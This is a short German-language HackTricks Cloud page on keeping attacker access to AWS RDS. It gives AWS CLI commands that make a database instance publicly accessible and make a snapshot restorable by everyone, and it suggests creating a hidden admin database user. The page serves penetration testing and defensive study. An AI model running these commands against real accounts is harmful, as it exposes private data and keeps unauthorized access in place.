Files
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md

987 B

AWS - RDS Persistenz

{{#include ../../../banners/hacktricks-training.md}}

RDS

Für weitere Informationen siehe:

{{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}}

Instanz öffentlich zugänglich machen: rds:ModifyDBInstance

Ein Angreifer mit dieser Berechtigung kann eine vorhandene RDS-Instanz ändern, um die öffentliche Zugänglichkeit zu aktivieren.

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

Erstellen Sie einen Admin-Benutzer in der DB

Ein Angreifer könnte einfach einen Benutzer in der DB erstellen, sodass selbst wenn das Passwort des Master-Benutzers geändert wird, er den Zugriff auf die Datenbank nicht verliert.

Snapshot öffentlich machen

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

{{#include ../../../banners/hacktricks-training.md}}